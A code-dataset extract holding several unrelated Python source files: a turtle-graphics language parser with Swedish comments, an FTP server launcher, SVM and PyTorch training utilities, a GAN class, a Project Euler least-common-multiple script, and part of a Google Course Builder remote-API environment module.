if re.search(\"^#([0-9]|[A-F]|[a-f]){6}$\", q.peek()):\n leonardo.color = q.peek().upper()\n latestRow = q.first.row\n q.dequeue()\n if q.peek()==\".\":\n # print(\"Matchar COLOR HEX .\")\n latestRow = q.first.row\n q.dequeue()\n match(q, leonardo)\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n\n elif re.search(\"^REP$\", q.peek(), re.IGNORECASE):\n # print(\"Matchar REP\")\n latestRow = q.first.row\n q.dequeue()\n newQ,latestRow = repHelp(q)\n match(newQ, leonardo)\n # print(\"KLARA MED REP\")\n match(q, leonardo)\n\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n\n\ndef repHelp(q, inner = False):\n\n n = isNumber(q.peek())\n row = q.first.row\n latestRow = q.first.row\n if n:\n # print(\"NUMMER\")\n q.dequeue()\n listData = []\n listRow = []\n\n ######### CASE MED CITATTECKEN #########\n if q.peek()==\"\\\"\":\n # print(\"CITATTECKEN\")\n latestRow = q.first.row\n q.dequeue()\n\n while q.peek() != \"\\\"\" and q.peek() != None:\n # print(\"WHILE\", q.peek())\n\n\n ##### NÄSTLAD LOOP ######\n if q.peek().upper() == \"REP\": # REP I REP\n # print(\"NÄSTLAD REP\")\n latestRow = q.first.row\n q.dequeue()\n\n nextQ, latestRow = repHelp(q, True)\n while nextQ.peek() != None:\n listRow.append(nextQ.first.row) # lägg till rad och\n #latestRow = nextQ.first.row\n listData.append(nextQ.first.data) # data i våra listor\n nextQ.dequeue()\n ##### SLUT PÅ NÄSTLAD LOOP #####\n\n # print(\"listData: \", listData)\n # Lägg till i listorna\n if q.peek() == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n\n if q.peek() != \"\\\"\" and q.peek().upper() != \"REP\":\n listRow.append(q.first.row)\n listData.append(q.first.data)\n latestRow = q.first.row\n q.dequeue()\n\n\n if q.peek() == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n latestRow = q.first.row\n q.dequeue() # Ta bort \"\n\n\n\n ######## CASE UTAN CITATTECKEN, GÅ EFTER ROW ISTÄLLET #########\n else:\n\n # NÄSTLAD LOOP\n if q.peek().upper() == \"REP\":\n # print(\"Rep i rep utan citat\")\n\n latestRow = q.first.row\n q.dequeue()\n # print(\"Gått in i nästlad rep\")\n nextQ,latestRow = repHelp(q)\n\n while nextQ.peek() != None:\n # print(\"NextQ: \", nextQ.peek())\n listRow.append(nextQ.first.row) # lägg till rad och\n listData.append(nextQ.first.data) # data i våra listor\n # latestRow = q.first.row\n nextQ.dequeue()\n\n # REP 5 LEFT 90.\n elif q.peek() != None:\n nextElemtAintNone = True\n while nextElemtAintNone:\n # print(\"STUFF I WHILE: \", q.peek())\n\n if q.peek() == \".\":\n listData.append(\".\")\n listRow.append(q.first.row)\n latestRow = q.first.row\n q.dequeue() # Ta bort punkten.\n nextElemtAintNone = False\n\n elif q.peek() != None: # special case om vi haft en rep i denna rep\n listRow.append(q.first.row)\n listData.append(q.first.data)\n # print(\"ETT VARV:\", q.peek())\n latestRow = q.first.row\n q.dequeue()\n else:\n nextElemtAintNone = False\n\n\n # Lägg till i listorna\n\n\n ########## HÄR SLUTAR CASET #############\n\n\n\n\n\n\n # print(\"DETTA ÄR LISTAN:\")\n # print(listData)\n\n newQ = LinkedQ()\n while n > 0:\n for i in range(0, len(listData)): # Lägg till alla saker i vår nya queue\n # print(\"ewQ: \", listData[i])\n newQ.enqueue(listData[i], listRow[i])\n n = n-1\n\n\n return newQ,latestRow\n\n\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n\n\n\n\n# Endast UP, DOWN, LEFT, RIGTH får skickas in här.\ndef updown(leo, inst):\n if inst == \"UP\":\n leo.down = False\n elif inst == \"DOWN\":\n leo.down = True\n\n return\n\n# Utför operationer med Leonardo.\ndef move(leo, inst, arg):\n if inst == \"LEFT\":\n leo.angle += arg\n elif inst == \"RIGHT\":\n leo.angle -= arg\n elif inst == \"FORW\":\n createRoute(leo, arg)\n elif inst == \"BACK\":\n createRoute(leo, -arg)\n return leo\n\n# Kolla att nodens data är ett tal följt av en punkt.\n# Return talet.\ndef isNumber(s):\n if re.search(\"^\\d+$\", s):\n return int(s)\n\n return False\n\n\n\n\ndef createRoute(leo, d):\n newX = float(leo.x + d * math.cos((math.pi*leo.angle)/180))\n newY = float(leo.x + d * math.sin((math.pi*leo.angle)/180))\n #(x+dcos(πv/180),y+dsin(πv/180))\n\n # Faktiska värden.\n newX = float(\"{0:.5f}\".format(leo.x + d * math.cos((math.pi*leo.angle)/180)))\n newY = float(\"{0:.5f}\".format(leo.y + d * math.sin((math.pi*leo.angle)/180)))\n if newX == -0:\n newX = 0\n if newY == -0:\n newY = 0\n\n\n # Det vi skriver ut.\n if leo.down:\n xS = '%.4f' % leo.x\n yS = '%.4f' % leo.y\n xNS = '%.4f' % newX\n yNS = '%.4f' % newY\n leo.printout.append(leo.color+\" \"+xS+\" \"+yS+\" \"+xNS+\" \"+yNS)\n leo.x = newX\n leo.y = newY\n\n\n\n\n\n\n\n\n\n\n\nmain()\n","sub_path":"S2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"631008222","text":"# coding=utf-8\n\nfrom handlers import FTPCommandHandler, ls_callback, open_callback, cd_callback, rm_callback, get_callback, put_callback, FileHandler\nfrom threaded_server import FTPServer\nfrom ftp_client_handler import FTPClientHandler\n\nif __name__ == '__main__':\n server = FTPServer(\"0.0.0.0\", 50000, 5)\n server.listen()\n callback_table = {\n \"ls\": ls_callback,\n \"open\": open_callback,\n \"cd\": cd_callback,\n \"rm\": rm_callback,\n \"get\": get_callback,\n \"put\": put_callback\n }\n server.accept_connections(FTPClientHandler, FTPCommandHandler(callback_table), FileHandler(), True)\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"68655281","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 18 13:54:15 2018\n\n@author: Mir, A.\n\"\"\"\n\nfrom dataproc import read_data\nfrom eval_classifier import initializer\nfrom collections import OrderedDict\n\nclass UserInput:\n\n \"\"\"\n This class stores user inputs\n \"\"\"\n\n def __init__(self, data_tuple, cl_type, result_path, kernel, \\\n rect_k, test_m_tuple, dict_para):\n\n # Initializing all the inputs\n self.X_train, self.y_train = data_tuple[0], data_tuple[1]\n self.filename = data_tuple[2]\n self.classifier_type = cl_type\n self.result_path = result_path\n self.kernel_type = kernel\n self.rect_kernel = rect_k # Percentage of samples for Rectangular kernel\n self.test_method_tuple = test_m_tuple\n \n # Parameters\n #self.lower_b_c, self.upper_b_c = l_b_c, u_b_c\n #self.knn_l, self.knn_u = k_l, k_u\n # Lower and upper bounds of gamma parameter\n #self.lower_b_u, self.upper_b_u = l_b_u, u_b_u\n \n self.dict_parameters = dict_para\n\n\nif __name__ == '__main__':\n \n \"\"\"\n List of classifiers\n TSVM\n TBSVM\n WTSVM\n RKTSVM\n \"\"\"\n \n # Default parameters for each classifier\n # {'C1': (-5, 5), 'C2': (-5, 5), 'C3': (0, 0), 'k': (2, 8), \\\n # 'u': (0, 0)}\n def_para_RKTSVM = {'C1': (-5, 2), 'C2': (-5, 2), 'C3': None, 'k': (2, 12),\n 'u': None}\n \n def_para_TSVM = {'C1': (-5, 2), 'C2': (-5, 2), 'C3': None, 'k': None, \\\n 'u': (-10, 2)}\n \n def_para_TBSVM = {'C1': (-8, 2), 'C2': None, 'C3': (-8, 2), 'C4': None, \\\n 'u': (-10, 2)}\n \n def_para_WTSVM = {'C1': (-5, 2), 'C2': None, 'C3': None, 'k': (3, 12), \\\n 'u': (-10, 2)}\n \n dataset = read_data('../dataset/Fertility.csv')\n \n user_in_obj = UserInput(dataset, 'TBSVM', './result', 'RBF', 1, \\\n ('CV', 5), def_para_TBSVM)\n \n initializer(user_in_obj)\n ","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"423037943","text":"import time\nimport numpy as np\nimport torch\n\nfrom torch.autograd import Variable\n\nfrom maps import NamedDict\n\nimport data_utils\nimport utils\n\nfrom pdb import set_trace as st\n\ndef vectors_dims_dont_match(Y,Y_):\n '''\n Checks that vector Y and Y_ have the same dimensions. If they don't\n then there might be an error that could be caused due to wrong broadcasting.\n '''\n DY = tuple( Y.size() )\n DY_ = tuple( Y_.size() )\n if len(DY) != len(DY_):\n return True\n for i in range(len(DY)):\n if DY[i] != DY_[i]:\n return True\n return False\n\ndef index_batch(X,batch_indices,dtype):\n '''\n returns the batch indexed/sliced batch\n '''\n # if len(X.size()) == 1: # i.e. dimension (M,) just a vector\n # batch_xs = X[batch_indices].type(dtype)\n # else:\n # batch_xs = X[batch_indices,:].type(dtype)\n #batch_xs = torch.index_select(input=X,dim=0,index=batch_indices) #torch.index_select(input, dim, index, out=None)\n batch_xs = torch.index_select(X,0,batch_indices)\n return batch_xs\n\ndef get_batch2(X,Y,M,dtype):\n '''\n get batch for pytorch model\n '''\n # TODO fix and make it nicer, there is pytorch forum question\n dtype_x,dtype_y = (dtype[0],dtype[1]) if len(dtype) == 2 else (dtype,dtype)\n #X,Y = X.data.numpy(), Y.data.numpy()\n N = len(Y)\n valid_indices = np.array( range(N) )\n batch_indices = torch.LongTensor(np.random.choice(valid_indices,size=M,replace=False))\n batch_xs = index_batch(X,batch_indices,dtype_x)\n batch_ys = index_batch(Y,batch_indices,dtype_y)\n return batch_xs, batch_ys\n\ndef SGD_perturb(mdl, Xtr,Ytr,Xv,Yv,Xt,Yt, optimizer,loss, M,eta,nb_iter,A ,logging_freq ,dtype_x,dtype_y, perturbfreq,perturb_magnitude, reg,reg_lambda, stats_collector):\n '''\n '''\n classification_task = type(Ytr[0]) == np.int64\n ''' wrap data in torch '''\n Xtr,Xv,Xt = data_utils.data2FloatTensor(Xtr,Xv,Xt)\n Ytr,Yv,Yt = data_utils.data2LongTensor(Ytr,Yv,Yt) if classification_task else data_utils.data2FloatTensor(Ytr,Yv,Yt)\n ## wrap in pytorch Variables\n Xtr,Ytr,Xv,Yv,Xt,Yt = data_utils.data2torch_variable(Xtr,Ytr,Xv,Yv,Xt,Yt)\n ''' Start training '''\n N_train, _ = tuple( Xtr.size() )\n for i in range(0,nb_iter):\n optimizer.zero_grad()\n batch_xs, batch_ys = get_batch2(Xtr,Ytr,M,(dtype_x,dtype_y)) # [M, D], [M, 1]\n ''' FORWARD PASS '''\n y_pred = mdl(batch_xs)\n if vectors_dims_dont_match(batch_ys,y_pred) and not classification_task: ## Check vectors have same dimension\n raise ValueError('You vectors don\\'t have matching dimensions. It will lead to errors: \\n batch_ys={batch_ys.size()},y_pred={y_pred.size()}')\n batch_loss = loss(input=y_pred,target=batch_ys) + reg_lambda*reg\n batch_loss.backward() # Use autograd to compute the backward pass. Now w will have gradients\n \"\"\" Update parameters \"\"\"\n optimizer.step()\n ''' Collect training stats '''\n if i % (nb_iter/10) == 0 or i == 0 and False:\n current_train_loss,train_acc = stats_collector.loss(mdl,Xtr,Ytr),stats_collector.acc(mdl,Xtr,Ytr)\n current_test_loss,test_acc = stats_collector.loss(mdl,Xt,Yt),stats_collector.acc(mdl,Xt,Yt)\n print('\\n-------------')\n print(f'i={i}, current_train_loss={current_train_loss} \\ni={i}, train_error = {train_acc}')\n print(f'i={i}, current_test_loss={current_test_loss}, \\ni={i}, test_error = {test_acc}')\n ## stats logger\n if i % logging_freq == 0 or i == 0:\n stats_collector.collect_stats(i, mdl, Xtr,Ytr,Xv,Yv,Xt,Yt)\n ## DO OP\n if i%perturbfreq == 0 and perturb_magnitude != 0 and i != 0:\n for W in mdl.parameters():\n Din,Dout = W.data.size()\n std = perturb_magnitude\n noise = torch.normal(means=0.0*torch.ones(Din,Dout),std=std)\n W.data.copy_(W.data + noise)\n\ndef SGD_pert_then_train(mdl, Xtr,Ytr,Xv,Yv,Xt,Yt, optimizer,loss, M,nb_iter ,logging_freq ,dtype_x,dtype_y, perturbfreq,perturb_magnitude, iterations_switch_mode, reg,reg_lambda, stats_collector):\n '''\n '''\n classification_task = type(Ytr[0]) == np.int64\n ''' wrap data in torch '''\n Xtr,Xv,Xt = data_utils.data2FloatTensor(Xtr,Xv,Xt)\n Ytr,Yv,Yt = data_utils.data2LongTensor(Ytr,Yv,Yt) if classification_task else data_utils.data2FloatTensor(Ytr,Yv,Yt)\n ## wrap in pytorch Variables\n Xtr,Ytr,Xv,Yv,Xt,Yt = data_utils.data2torch_variable(Xtr,Ytr,Xv,Yv,Xt,Yt)\n ''' Start training '''\n pert_mode = True\n N_train, _ = tuple( Xtr.size() )\n for i in range(0,nb_iter):\n optimizer.zero_grad()\n batch_xs, batch_ys = get_batch2(Xtr,Ytr,M,(dtype_x,dtype_y)) # [M, D], [M, 1]\n ''' FORWARD PASS '''\n y_pred = mdl(batch_xs)\n if vectors_dims_dont_match(batch_ys,y_pred) and not classification_task: ## Check vectors have same dimension\n raise ValueError(f'You vectors don\\'t have matching dimensions. It will lead to errors: \\n batch_ys={batch_ys.size()},y_pred={y_pred.size()}')\n batch_loss = loss(input=y_pred,target=batch_ys) + reg_lambda*reg\n batch_loss.backward() # Use autograd to compute the backward pass. Now w will have gradients\n \"\"\" Update parameters \"\"\"\n optimizer.step()\n ''' Collect training stats '''\n if i % (nb_iter/10) == 0 or i == 0 and False:\n current_train_loss,train_acc = stats_collector.loss(mdl,Xtr,Ytr),stats_collector.acc(mdl,Xtr,Ytr)\n current_test_loss,test_acc = stats_collector.loss(mdl,Xt,Yt),stats_collector.acc(mdl,Xt,Yt)\n print('\\n-------------')\n print(f'i={i}, current_train_loss={current_train_loss}, i={i}, train_error = {train_acc}')\n print(f'i={i}, current_test_loss={current_test_loss}, i={i}, test_error = {test_acc}')\n ## stats logger\n if i % logging_freq == 0 or i == 0:\n stats_collector.collect_stats(i, mdl, Xtr,Ytr,Xv,Yv,Xt,Yt)\n ## DO OP\n if pert_mode:\n if i%perturbfreq == 0 and perturb_magnitude != 0 and i != 0:\n for W in mdl.parameters():\n Din,Dout = W.data.size()\n std = perturb_magnitude\n noise = torch.normal(mean=0.0*torch.ones(Din,Dout),std=std*torch.ones(Din,Dout))\n W.data.copy_(W.data + noise)\n ''' switch mode? '''\n pert_mode = (i < iterations_switch_mode)\n\n######\n\nclass StatsCollector:\n '''\n Class that has all the stats collected during training.\n '''\n def __init__(self, mdl,loss,accuracy, dynamic_stats=None):\n '''\n dynamic_stats = an array of tuples (STORER,UPDATER) where the storer\n is a data structure (like a list) that gets updated according to updater.\n For the moment updater receives storer and all the parameters from collect_stats\n (like the mdl, the data sets, the iteration number)\n '''\n ''' functions that encode reward/loss '''\n self.loss = loss\n self.acc = accuracy\n ''' loss & errors lists'''\n self.train_losses, self.val_losses, self.test_losses = [], [], []\n self.train_errors, self.val_errors, self.test_errors = [], [], []\n self.train_accs, self.val_accs, self.test_accs = [], [], []\n ''' stats related to parameters'''\n nb_param_groups = len( list(mdl.parameters()) )\n self.grads = [ [] for i in range(nb_param_groups) ]\n self.w_norms = [ [] for i in range(nb_param_groups) ]\n ''' '''\n if dynamic_stats is not None:\n self.dynamic_stats_storer = {}\n self.dynamic_stats_updater = {}\n for name,(storer,updater) in dynamic_stats.items():\n self.dynamic_stats_storer[name] = storer\n self.dynamic_stats_updater[name] = updater\n else:\n # TODO empty dict or None?\n self.dynamic_stats_storer = None\n self.dynamic_stats_updater = None\n\n def collect_mdl_params_stats(self,mdl):\n ''' log parameter stats'''\n for index, W in enumerate(mdl.parameters()):\n self.w_norms[index].append( W.data.norm(2) )\n self.grads[index].append( W.grad.data.norm(2) )\n if utils.is_NaN(W.grad.data.norm(2)):\n raise ValueError(f'Nan Detected error happened at: i={i} loss_val={loss_val}, loss={loss}')\n\n def collect_stats(self, i, mdl, Xtr,Ytr,Xv,Yv,Xt,Yt):\n ''' log train losses '''\n self.train_losses.append( self.loss(mdl,Xtr,Ytr).item() )\n self.val_losses.append( self.loss(mdl,Xv,Yv).item() )\n self.test_losses.append( self.loss(mdl,Xt,Yt).item() )\n ''' log train errors '''\n self.train_errors.append( self.acc(mdl,Xtr,Ytr).item() )\n self.val_errors.append( self.acc(mdl,Xv,Yv).item() )\n self.test_errors.append( self.acc(mdl,Xt,Yt).item() )\n ''' log parameter stats'''\n for index, W in enumerate(mdl.parameters()):\n self.w_norms[index].append( W.data.norm(2) )\n self.grads[index].append( W.grad.data.norm(2) )\n if utils.is_NaN(W.grad.data.norm(2)):\n raise ValueError(f'Nan Detected error happened at: i={i} loss_val={loss_val}, loss={loss}')\n ''' Update the '''\n if self.dynamic_stats_storer is not None:\n for name in self.dynamic_stats_updater:\n storer = self.dynamic_stats_storer[name]\n updater = self.dynamic_stats_updater[name]\n updater(storer,i, mdl, Xtr,Ytr,Xv,Yv,Xt,Yt)\n\n def get_stats_dict(self):\n stats = NamedDict(\n train_losses=self.train_losses,val_losses=self.val_losses,test_losses=self.test_losses,\n train_errors=self.train_errors,val_errors=self.val_errors,test_errors=self.test_errors,\n grads=self.grads,\n w_norms=self.w_norms\n )\n if self.dynamic_stats_storer is not None:\n stats = NamedDict(stats,**self.dynamic_stats_storer)\n return stats\n\n def append_losses_errors(self,train_loss, train_error, test_loss, test_error):\n self.train_losses.append(train_loss)\n self.test_losses.append(test_loss)\n self.train_errors.append(train_error)\n self.test_errors.append(test_error)\n self.train_accs.append(1.0-train_error)\n self.test_accs.append(1.0-test_error)\n\n####\n\ndef train_cifar(args, nb_epochs, trainloader,testloader, net,optimizer,criterion,logging_freq=2000):\n # TODO: test loss\n for epoch in range(nb_epochs): # loop over the dataset multiple times\n running_train_loss = 0.0\n #running_test_loss = 0.0\n for i, data in enumerate(trainloader, 0):\n # get the inputs\n start_time = time.time()\n inputs, labels = data\n if args.enable_cuda:\n inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())\n else:\n inputs, labels = Variable(inputs), Variable(labels)\n # zero the parameter gradients\n optimizer.zero_grad()\n # forward + backward + optimize\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n # print statistics\n running_train_loss += loss.item()\n seconds,minutes,hours = utils.report_times(start_time)\n st()\n if i % logging_freq == logging_freq-1: # print every logging_freq mini-batches\n # note you dividing by logging_freq because you summed logging_freq mini-batches, so the average is dividing by logging_freq.\n print(f'monitoring during training: eptoch={epoch+1}, batch_index={i+1}, loss={running_train_loss/logging_freq}')\n running_train_loss = 0.0\n\ndef evalaute_mdl_data_set(loss,error,net,dataloader,enable_cuda):\n '''\n Evaluate the error of the model under some loss and error with a specific data set.\n '''\n running_loss,running_error = 0,0\n for i,data in enumerate(dataloader):\n inputs, labels = extract_data(enable_cuda,data,wrap_in_variable=True)\n outputs = net(inputs)\n running_loss += loss(outputs,labels).item()\n running_error += error(outputs,labels)\n return running_loss/(i+1),running_error/(i+1)\n\ndef extract_data(enable_cuda,data,wrap_in_variable=False):\n inputs, labels = data\n if enable_cuda:\n inputs, labels = inputs.cuda(), labels.cuda()\n if wrap_in_variable:\n inputs, labels = Variable(inputs), Variable(labels)\n return inputs, labels\n\ndef train_and_track_stats(args, nb_epochs, trainloader,testloader, net,optimizer,criterion,error_criterion ,stats_collector):\n enable_cuda = args.enable_cuda\n ##\n for epoch in range(nb_epochs): # loop over the dataset multiple times\n running_train_loss,running_train_error = 0.0,0.0\n running_test_loss,running_test_error = 0.0,0.0\n for (i,(data_train,data_test)) in enumerate( zip(trainloader,testloader) ):\n ''' zero the parameter gradients '''\n optimizer.zero_grad()\n ''' train step = forward + backward + optimize '''\n inputs, labels = extract_data(enable_cuda,data_train,wrap_in_variable=True)\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n running_train_loss += loss.item()\n running_train_error += error_criterion(outputs,labels)\n ''' test evaluation '''\n inputs, labels = extract_data(enable_cuda,data=data_test,wrap_in_variable=True)\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n running_test_loss += loss.item()\n running_test_error += error_criterion(outputs,labels)\n ''' print error first iteration'''\n if i == 0: # print on the first iteration\n print(f'--\\ni={i}, running_train_loss={running_train_loss}, running_train_error={running_train_error}, running_test_loss={running_test_loss},running_test_error={running_test_error}')\n ''' End of Epoch: collect stats'''\n train_loss_epoch, train_error_epoch = running_train_loss/(i+1), running_train_error/(i+1)\n test_loss_epoch, test_error_epoch = running_test_loss/(i+1), running_test_error/(i+1)\n stats_collector.collect_mdl_params_stats(net)\n stats_collector.append_losses_errors(train_loss_epoch, train_error_epoch, test_loss_epoch, test_error_epoch)\n print(f'epoch={epoch}, train_loss_epoch={train_loss_epoch}, train_error_epoch={train_error_epoch}, test_loss_epoch={test_loss_epoch},test_error_epoch={test_error_epoch}')\n return train_loss_epoch, train_error_epoch, test_loss_epoch, test_error_epoch\n","sub_path":"pytorch_experiments/training_algorithms.py","file_name":"training_algorithms.py","file_ext":"py","file_size_in_byte":14883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"553216840","text":"class MSEGAN():\n def __init__(self, G, D, g_optim, d_optim, criterion):\n self.G = G\n self.D = D\n self.g_optim = g_optim\n self.d_optim = d_optim\n self.criterion = criterion\n self.images = []\n self.g_losses = []\n self.d_losses = []\n self.mse = nn.MSELoss()\n \n def train_G(self, real_images):\n \"\"\" \n Sample a batch of random noise\n Generate fake samples using the noise\n Feed fake samples to D and get prediction scores\n Optimize G to get the scores close to 1 (means real samples)\n \"\"\" \n self.g_optim.zero_grad()\n \n noises = Variable(torch.randn(self.batch_size, 128)).to(device)\n fake_samples = self.G(noises)\n\n # MSE\n loss = self.mse(fake_samples, real_images)\n loss.backward()\n self.g_optim.step()\n \n return loss\n \n \n def train_D(self, real_images):\n \"\"\"\n Get a batch of real images\n Get a batch of fake samples from G\n Optimize D to correctly classify the two batches\n \"\"\"\n self.d_optim.zero_grad()\n \n noises = Variable(torch.randn(self.batch_size, 128)).to(device)\n fake_samples = self.G(noises).detach()\n \n # real, close to 1\n real_pred = self.D(real_images)\n real_loss = self.criterion(real_pred.squeeze(), Variable(torch.ones(self.batch_size)).to(device))\n #real_loss.backward()\n \n # fake, close to 0\n fake_pred = self.D(fake_samples)\n fake_loss = self.criterion(fake_pred.squeeze(), Variable(torch.zeros(self.batch_size)).to(device))\n #fake_loss.backward()\n \n loss = real_loss + fake_loss\n loss.backward()\n self.d_optim.step()\n\n return loss\n \n def train(self, data_loader, num_epochs, batch_size): \n self.batch_size = batch_size\n \n self.G.train()\n self.D.train()\n \n noise = Variable(torch.randn(self.batch_size, 128)).to(device)\n \n for epoch in range(num_epochs):\n start = time.time()\n print('\\n' + 'Epoch {}/{}'.format(epoch+1, num_epochs))\n print('-' * 20)\n g_error = 0.0\n d_error = 0.0\n for i, data in enumerate(data_loader):\n img, label = data\n img = img.to(device)\n label = label.to(device)\n d_error += self.train_D(img)\n g_error += self.train_G(img)\n\n img = self.G(noise).cpu().detach()\n img = make_grid(img)\n self.images.append(img)\n self.g_losses.append(float(g_error)/i)\n self.d_losses.append(float(d_error)/i)\n print('g_loss: {:.3} | d_loss: {:.3}\\r'.format(float(g_error)/i, float(d_error)/i))\n print('Time: {}'.format(time.time()-start))","sub_path":"MSEGAN.py","file_name":"MSEGAN.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"182328187","text":"#############################################################################\n#Problem Set: Project Euler\n#Problem Name: Smallest Multiple\n#Problem Number: 5\n#\n#Question:\n#-----------\n#2520 is the smallest number that can be divided by each of the\n#numbers from 1 to 10 without any remainder.\n#\n#What is the smallest positive number that is evenly divisible\n#by all of the numbers from 1 to 20?\n#############################################################################\n\"\"\"Finds the smallest positive number(or the lcm) which is evenly divisble\nby an aribitrary number, num, and all of its positive decending values\"\"\"\n\n\n#Intialize the list: factors, so it stores what we find in primeFactorization\nfactors = []\n\n\ndef primeFactorization(x):\n \"\"\"Break a number into its prime factors.\"\"\"\n #Loop through x starting at 2 to find the smallest factor\n for factor in range(2, x + 1):\n #if the variable factor divides x\n if x % factor == 0:\n #Store that factor\n factors.append(factor)\n \n #Divide x by that factor \n x = int(x / factor)\n \n #Find the other factors of the derived multiple\n primeFactorization(x)\n \n #If we find a factor end the loop so we can start over again\n #on the new multiple\n break\n\n\ndef lcm(num):\n \"\"\"Returns the least common multiple of all the numbers between\n 1 and num\"\"\"\n \n global factors #Using the factors variable that was globally defined\n foundFactors = [] #Intializing a place to store prime factors\n mult = 1 #Intializing a counter\n \n #We'll loop through the given num variable backwards starting with the\n #greatest value\n for n in range(num, -1, -1):\n factors = [] #Let's reinitalize factors every time we need new factors for a new number\n primeFactorization(n) #Get the constituent primes for our loop number\n for i in range(0, len(factors)): #Looping through the primes we found in varible factors\n #If we have a smaller quanity of primes in foundFactors\n if factors.count(factors[i]) > foundFactors.count(factors[i]):\n #Find out how many more primes we need\n amountOfFactors = factors.count(factors[i]) - foundFactors.count(factors[i])\n #Add that amount of primes to foundFactors\n while amountOfFactors:\n foundFactors.append(factors[i])\n amountOfFactors -= 1 #Keeping track of what we added\n for value in range(0, len(foundFactors)): #Loop through the factors we found in foundFactors\n mult *= foundFactors[value] #Multiply each of them together\n return print(mult)\n\n\n#When Running this code from commandline if you add an argument after the script name\n#it will implement the lcm function (up above) with that argument as input.\nif __name__ == \"__main__\":\n import sys\n lcm(int(sys.argv[1]))","sub_path":"Modules/project_euler/smallest_multiple_5.py","file_name":"smallest_multiple_5.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"577372062","text":"# Copyright 2013 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Remote environment manager for extract-transform-load utilities.\"\"\"\n\n__author__ = [\n 'johncox@google.com',\n]\n\nimport logging\nimport sys\nimport traceback\n\nfrom google.appengine.ext.remote_api import remote_api_stub\n\n# Url of help documentation we send the user to if there is an authentication\n# error.\n_AUTH_HELP_URL = 'https://code.google.com/p/course-builder/wiki/EtlAuth'\n# String. Prefix used to detect if a server is running locally.\n_LOCAL_SERVER_PREFIX = 'localhost'\n_LOG = logging.getLogger('coursebuilder.tools.etl')\nlogging.basicConfig()\n\n\nclass Environment(object):\n \"\"\"Sets up the execution environment to use remote_api for RPCs.\n\n As with any use of remote_api, this has three important caveats:\n\n 1. By going through the Remote API rather than your application's handlers,\n you are bypassing any business logic in those handlers. It is easy in\n this way to accidentally corrupt the system receiving your RPCs.\n 2. There is no guarantee that the code running on the system receiving your\n RPCs is the same version as the code running locally. It is easy to have\n version skew that corrupts the destination system.\n 3. Execution is markedly slower than running in production.\n \"\"\"\n\n def __init__(\n self, server, path='/_ah/remote_api', port=None, testing=False):\n \"\"\"Constructs a new Environment.\n\n Args:\n server: string. The full name of the server to connect to\n (myurl.appspot.com).\n path: string. The URL of your app's remote api entry point.\n port: int. When server is 'localhost', must be set to the API port\n of the dev appserver. Ignored otherwise.\n testing: boolean. For tests only, indicates testing mode.\n \"\"\"\n self._path = path\n self._port = port\n self._server = server\n self._testing = testing\n\n def _get_formatted_last_traceback(self):\n return ''.join(traceback.format_tb(sys.exc_info()[2]))\n\n def _get_secure(self):\n \"\"\"Returns boolean indicating whether or not to use https.\"\"\"\n return not self._is_localhost()\n\n def _get_server(self):\n if not self._is_localhost():\n return self._server\n else:\n assert self._port\n return '%s:%s' % (_LOCAL_SERVER_PREFIX, self._port)\n\n def _is_localhost(self):\n \"\"\"Returns True if environment is dev_appserver and False otherwise.\"\"\"\n return self._server.startswith(_LOCAL_SERVER_PREFIX)\n\n def establish(self):\n \"\"\"Establishes the environment for RPC execution.\"\"\"\n if self._testing:\n return\n\n try:\n remote_api_stub.ConfigureRemoteApiForOAuth(\n self._get_server(), self._path, secure=self._get_secure())\n remote_api_stub.MaybeInvokeAuthentication()\n # Must be broad -- we cannot know what types of exceptions App Engine\n # raises due to auth errors. pylint: disable=bare-except\n except:\n _LOG.error(\n 'Unable to authenticate. The most likely cause is that you '\n 'are missing OAuth2 credentials. For help getting those '\n 'credentials, see %s. Original error was:\\n%s',\n _AUTH_HELP_URL, self._get_formatted_last_traceback())\n sys.exit(1)\n\n def get_info(self):\n \"\"\"Returns string representation of the environment for logging.\"\"\"\n return 'server: %(server)s, path: %(path)s, port: %(port)s' % {\n 'path': self._path,\n 'port': self._port if self._is_localhost() else '',\n 'server': self._server,\n 